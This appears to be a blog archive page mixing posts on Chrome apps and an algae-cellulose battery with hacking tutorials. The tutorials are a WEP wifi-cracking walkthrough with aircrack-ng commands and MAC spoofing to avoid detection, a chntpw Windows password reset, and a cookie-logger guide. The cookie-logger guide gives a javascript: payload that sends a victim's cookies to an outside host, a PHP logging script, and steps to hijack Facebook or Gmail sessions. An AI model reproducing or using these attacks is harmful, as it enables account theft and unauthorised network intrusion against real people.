Showing posts with label FACEBOOK HACKED. Show all posts
Showing posts with label FACEBOOK HACKED. Show all posts

Top 5 Google Chrome Apps For Bloggers Must Check


Are you using a chrome browser for blogging  ? If yes then why can't you add Chrome apps which would make your blogging more fast,easy and fun. Here on this post i would like to share some top chrome apps that a blogger must have .

         A blogger must check out this awesome app which is the easiest way to update your blog .It is a full featured blog editor that integrated with your browser.You can create new posts,labels and even edit old blogs posts.It have simple and clean interface and more tools available.Both compose mode and HTML mode is enabled.
One highlisht is No need of Registration.

This app helps you to check how your blog views in various resolution .It resize entire browser to desktop,netbook,mobile and more resolution. This helps you to develop your blogger template .

 Best tool for web development.Allows inspect,edit and monitor CSS ,HTML codes, even if you don't know these languages.Found any white spaces in your blog ? You can fix with Firebug.Firebug can be used to reduce space in your blog.

This is one of the top chrome app for edit images which is layer base one.Pixlr is browser integrated app.No need of download,registeration, simple interface and not at all annoying.The editor is capable to reproduce PSD files.

It create screen shots of web pages , edit or annotate them and save into youcomputer at any formats.You can even export ito blogger ,email it and print out it.
Simple and Clean interface.

Technology Updates!

Imagine wrapping paper that could be a gift in and of itself because it lights up with words like "Happy Birthday." That is one potential application of a new biodegradable battery made of cellulose, the stuff of paper.

Scientists worldwide are striving to develop thin, flexible, lightweight, inexpensive, environmentally friendly batteries made entirely from nonmetal parts. Among the most promising materials for these batteries are conducting polymers.

However, until now these have impractical for use in batteries — for instance, their ability to hold a charge often degrades over use.

Easy to make

The key to this new battery turned out to be an often bothersome green algae known as Cladophora. Rotting heaps of this hairlike freshwater plant throughout the world can lead to unsightly, foul-smelling beaches.

This algae makes an unusual kind of cellulose typified by a very large surface area, 100 times that of the cellulose found in paper. This allowed researchers to dramatically increase the amount of conducting polymer available for use in the new device, enabling it to better recharge, hold and discharge electricity.

"We have long hoped to find some sort of constructive use for the material from algae blooms and have now been shown this to be possible," said researcher Maria Strømme, a nanotechnologist at Uppsala University in Sweden. "This creates new possibilities for large-scale production of environmentally friendly, cost-effective, lightweight energy storage systems."

The new batteries consisted of extremely thin layers of conducting polymer just 40 to 50 nanometers or billionths of a meter wide coating algae cellulose fibers only 20 to 30 nanometers wide that were collected into paper sheets.

"They're very easy to make," Strømme said.

Quick to charge

They could hold 50 to 200 percent more charge than similar conducting polymer batteries, and once better optimized, they might even be competitive with commercial lithium batteries, the researchers noted. They also recharged much faster than conventional rechargeable batteries — while a regular battery takes at least an hour to recharge, the new batteries could recharge in anywhere from eight minutes to just 11 seconds.

The new battery also showed a dramatic boost in the ability to hold a charge over use. While a comparable polymer battery showed a 50 percent drop in the amount of charge it could hold after 60 cycles of discharging and recharging, the new battery showed just a 6 percent loss through 100 charging cycles.

"When you have thick polymer layers, it's hard to get all the material to recharge properly, and it turns into an insulator, so you lose capacity," said researcher Gustav Nyström, an electrochemist at Uppsala University. "When you have thin layers, you can get it fully discharged and recharged."

Flexible electronics

The researchers suggest their batteries appear well-suited for applications involving flexible electronics, such as clothing and packaging.

"We're not focused on replacing lithium ion batteries — we want to find new applications where batteries are not used today," Strømme told LiveScience. "What if you could put batteries inside wallpaper to charge sensors in your home? If you could put this into clothes, can you couple that with detectors to analyze sweat from your body to tell if there's anything wrong?"

Future directions of research include seeing how much charge these batteries lose over time, a problem with polymer batteries and all batteries in general. They also want to see how much they can scale up these batteries, "see if we can make them much, much larger," Strømme said.

The scientists detailed their last month in the journal Nano Letters.

Hacking Wifi key using Backtrack

Wifi or Wireless Fidelity is the name of a popular wireless networking technology that uses radio waves to provide wireless high-speed Internet and network connections. Wifi has become an integral part of our lives today.

Right from Mobile Phones to Laptops to Ipads every device now has Wifi support.
Wifi is secured using a WPA protocol which intends to secure Wireless LANs like Wired LAN’s by encrypting data over radio waves, however, it has been found that WEP is not as secure as once believed. Now almost anyone can hack into a Wifi network by generating the valid WEP key using Bactrack. Read on to learn how ..

Disclaimer: This tutorial is given for educational purposes only and that for any misuse of this information, the blogger cannot be held liable.

SETTING UP THE CARD AND THE CONSOLE
Boot up Backtrack on your virtual machine/laptop and open up the command console and type the commands as they are given -
* ifconfig
This is the Linux equivalent of ipconfig, you will see the network adapters in your system. See which one is for Wi-Fi. A few examples are wlan0, wifi0, etc.
* airmon-ng
This command will initialize the Wi-Fi network monitoring & will tell you how many networks are in range
* airmon-ng stop [Wi-Fi Card name(without the quotes)]
This command will stop the cards broadcast and reception immediately
* macchanger –mac [Desired MAC address] [Wi-Fi card name]
This command will change the current MAC address to any MAC address you desire, so that you don’t get caught later
* airmon-ng start [Wi-Fi Card name]
You will see another extra adapter that is set on monitor mode, use that adapter for all further purposes in the following commands where – ‘[Wi-Fi card name]’ appears
DUMPING PACKETS
Once you have set up all the parameters,you need to sniff and dump data packets in order to get the key.You can do so by using following commands. On the command console type these commands -
* airodump-ng [Wi-Fi card name]
Copy and paste the BSSID in the following command and execute it
* airodump-ng –c [Channel Number] –w [Desired Filename for later decryption] --bssid [BSSID] [Wi-Fi Card name]
As you execute the command, you will see a certain number of beacons and data packets that will be stored in the filename you have given. The file will be stored in the root of the system drive (Click on Computer and you will see the file).The file will be present in two formats: *.cap, *.txt.
SPEEDING UP THINGS
However packet dumping is quite a slow process,we need to speed up things to save our time.Open a new console after the first data packet has been stored and type the command in the new console and execute it
*airreplay-ng -1 0 –a [BSSID] –h [FAKED MAC ADDRESS] -e [Wi-Fi name (you wish to hack)] [Wi-Fi card name]
As you type this command you will see that the data packets required for breaking the key will increase dramatically thereby saving you a lot of time.
REVEALING WEP KEY
Open another console once you have around 20,000 data packets and type the following command to reveal the WEP key.
aircrack-ng –n 64 –b [BSSID] [Filename without the extension] Revealing the WEP Key -
As you type this command, you will see that a key will appear in front of you in the given below format:
XX:XX:XX:XX
It is not necessary that the key should have exactly the same digits as shown above so please don’t freak out if you see a 10 digit or 14 digit key. Also if the decryption fails, you can change the bit level of the decryption in the command:
aircrack-ng –n [BIT LEVEL] –b [BSSID] [Filename without extension]
Remember, the bit level should be a number of 2n where n:1,2,3,4…
e.g.
aircrack-ng –n 32 –b [BSSID] [Filename without the extension]
OR
aircrack-ng –n 128 –b [BSSID] [Filename without the extension] etc. etc.
Now just login using the WEP key you got.

Reset Admin Password of Windows XP, Vista and 7

This trick enables us to change the password of Windows Operating System Using Ubuntu 9.10 distribution installed on a usb drive.   Eventhough the titile states on XP, Vista and 7, the trick you are gonna read is also for 2000 and 2003. This method is applicable when you have some Alzheimer’s disease and you forgot your most important Windows login password.  And probably you do some idiotic things with all the password possibilities you know and then your account gets locked up. So there when you stand without knowing what to do, this trick comes to the rescue.
What do you need :

1) Unetbootin
2) Ubuntu 9.10 ISO (You can also download it using Unetbootin)
3)  chntpw
4) A Usb drive (1 gb or more)
Steps :
First we need to install Ubuntu 9.10 to the USB drive..  Open Unetbootin in a computer other than the target computer (you couldn’t do it on the target computer as it is already locked or forgotten password)
Select Ubuntu 9.10 or Select the “Disc image” option and select the path where you have downloaded the ISO. Select the type as USB drive and select the drive where the usb drive is displayed. Click Ok..
Then Wait..
It installs…
When it is done, click on “exit” and remove the USB drive. Yupeee!! You now have the live image of Ubuntu 9.10
Insert the Usb drive into the target computer. Start the computer, Boot from the usb drive. If it does not come, you may have to change the boot device preferences in the BIOS.
When you boot from the USB drive , the unetbootin options comes and you have to select “default” . Thus it boots into Ubuntu OS. Now you have access to the windows filesystem. Hurray!!
Now we need the tool chntpw. To get this software, connect to the internet and run the command :
sudo software-properties-gtk --enable-component=universe--enable-component=multiverse; sudo apt-get update; sudo apt-get install chntpw
Go to the terminal and change the directory to the password file
cd /media/path/to/disk/WINDOWS/system32/config/
Now run the chntpw tool
# sudo chntpw -u username SAM SYSTEM
When it is executed, it will just erase the password. Now you could restart and log into the windows without the password.
Anyway, as a security precaution , you may backup the data  in the hard disk, what if you mess it all up?? lolz..

How to Make a Cookie Logger to Hack Anyone's Accounts (Facebook, Gmail, Yahoo etc.)


A Cookie Logger is a Script that is used to steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger…
Hope you will enjoy Reading it...

STEP 1: First you have to create a file which can capture a person's cookie.So follow the following process.
this is last step actually ↓ 

  Give this code to victim to run in his browser (notice that here site name is http://hackingdatabase786.blogspot.in/ so replace or change it with your site name)


javascript:document.location='http://hackingdatabase786.blogspot.in/cookielogger.php?ex='.concat(escape(document.cookie));
 
STEP 2: Copy the Following Script into a Notepad File and save the file as cookielogger.php  

<?php
$filename = "logfile.txt";
if (isset($_GET["ex"]))
{
if (!$handle = fopen($filename, 'a'))
{
exit;
}
else
{
if (fwrite($handle, "\r\n" . $_GET["ex"]) === FALSE)
{

exit;
}
}

header("Location: http://www.google.com");
fclose($handle);
exit;
}
exit;
?>
STEP 3: Create a new Notepad File and Save it as logfile.txt
    
STEP 4: Upload these files to your server
cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
If you don’t have any Website then you can use the following Website to get a Free Website which has PHP support: http://www.0fees.net/signup.php
 
STEP 5: Now your cookie logger is ready to be used. Now All You Had To Do is Find The Victim & Try Cookie Logger / Cookie Stealer On Them…

Note :- Give Your Victim The Link Of GIF File…

javascript:document.location='http://hackingdatabase786.blogspot.in/cookielogger.php?ex='.concat(escape(document.cookie));
STEP 6: When the victim see the post he view the image of your link but when he will click on the image he will redirect on your given link and you will get his cookie in log.txt. The Cookie Would Look as Follows:
   
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9.
    
STEP 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before "=" is the name of the cookie and the string after "=" is its value. So Change the values of the cookies in the cookie Editor.
Now for this you will need a Firefox add-on named "Cookie Manager +
STEP 8: Go to the Website whose Account you have just hacked and you will find that you are logged in as the Victim and now you can change the victim’s account information.
NOTE: Make sure that from Step 6 to 8 the Victim should be Online because you are actually hijacking the Victim’s Session so if the Victim clicks on Log-out you will also Log-out automatically.

If you have any queries or suggestions related to this post on 'How to Make a Cookie Logger to Hack Anyone's Accounts (Facebook, Gmail, Yahoo etc.)', you're most welcome in comments..! :)